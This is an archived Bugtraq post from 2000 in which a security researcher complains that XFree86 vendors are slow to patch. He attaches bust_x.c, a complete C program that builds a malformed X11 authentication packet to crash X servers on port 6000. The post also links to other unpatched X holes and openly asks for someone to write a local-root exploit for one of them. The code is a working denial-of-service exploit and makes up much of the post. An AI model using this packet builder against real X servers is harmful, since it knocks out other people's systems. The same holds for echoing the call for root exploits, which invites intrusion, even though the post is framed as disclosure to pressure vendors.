5636143 2000-10-25 08:52 /119 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <13411>
Kommentar till text 5601836 av Brevbäraren (som är implementerad i) Python
Ärende: Re: another Xlib buffer overflow
------------------------------------------------------------
From: Chris Evans <chris@SCARY.BEASTS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.21.0010242005220.7809-100000@ferret.lmh.ox.ac.uk>
On Sun, 15 Oct 2000, Kris Kennaway wrote:
> On Fri, Oct 13, 2000 at 11:37:01PM +0200, Matthieu Herrb wrote:
>
> > It was fixed in XFree86 4.0. From the CHANGELOG:
> >
> > XFree86 3.9Nu (13 January 1999)
> > [...]
> > 2141. Fix some sun_path overflows in xtrans.
>
> Wow, there's nothing like supporting the product release which
> everyone actually uses.
>
> XFree86 did the same thing with the other security problems a few
> months ago (fixed it silently in 4.0.1 and forced vendors who care to
> manually hunt down and extract the patches from their CVS repo and
> apply them by hand to their 3.3.6 package). Mail to their security
> contact address also went unanswered on this issue..
Hi Kris,
Well, I'm sufficiently underwhelmed by response to recent XFree
security issues, that I'm going to throw some fuel on the fire.
Below is a little packet builder which builds the DoS packet which
you can send to X port 6000. I didn't include it in my original
advisory, which may be located at:
http://www.securityfocus.com/archive/1/60869
However, this advisory contained ample information for a malicious
party to derive an exploit packet. This is why I have no problem
sending my DoS packet builder. Hopefully this post might prompt
action from slower vendors (even if it is inspired by irate users).
As well as the DoS issue, a lot of vendors still have the following X
realted issues outstanding (I posted these about the same time as the
original DoS post):
A nasty hole which will almost certainly give localhost root in the
presence of suid-root X clients: [EXPLOIT PLEASE ANYONE?]
http://www.securityfocus.com/archive/1/65699
An irritating libICE DoS, affects GNOME-1.0 desktops:
http://www.securityfocus.com/archive/1/65692 [INCLUDED EXPLOIT]
And, of course, Michal's sun_path overflow which started this thread..
Cheers
Chris
/* bust_x.c
* Demonstration purposes only!
* Chris Evans <chris@scary.beasts.org>
*/
int
main(int argc, const char* argv[])
{
char bigbuf[201];
short s;
char c;
c = -120;
memset(bigbuf, c, sizeof(bigbuf));
/* Little endian */
c = 'l';
write(1, &c, 1);
/* PAD */
c = 0;
write(1, &c, 1);
/* Major */
s = 11;
write(1, &s, 2);
/* Minor */
s = 0;
write(1, &s, 2);
/* Auth proto len */
s = 19;
write(1, &s, 2);
/* Auth string len */
s = 200;
write(1, &s, 2);
/* PAD */
s = 0;
write(1, &s, 2);
/* Auth name */
write(1, "XC-QUERY-SECURITY-1", 19);
/* byte to round to multiple of 4 */
c = 0;
write(1, &c, 1);
/* Auth data */
/* Site policy please */
c = 2;
write(1, &c, 1);
/* "permit" - doesn't really matter */
c = 0;
write(1, &c, 1);
/* number of policies: -1, loop you sucker:) */
c = -1;
write(1, &c, 1);
/* Negative stringlen.. 201 of them just in case, chortle... */
write(1, bigbuf, sizeof(bigbuf));
}
(5636143) ------------------------------------------(Ombruten)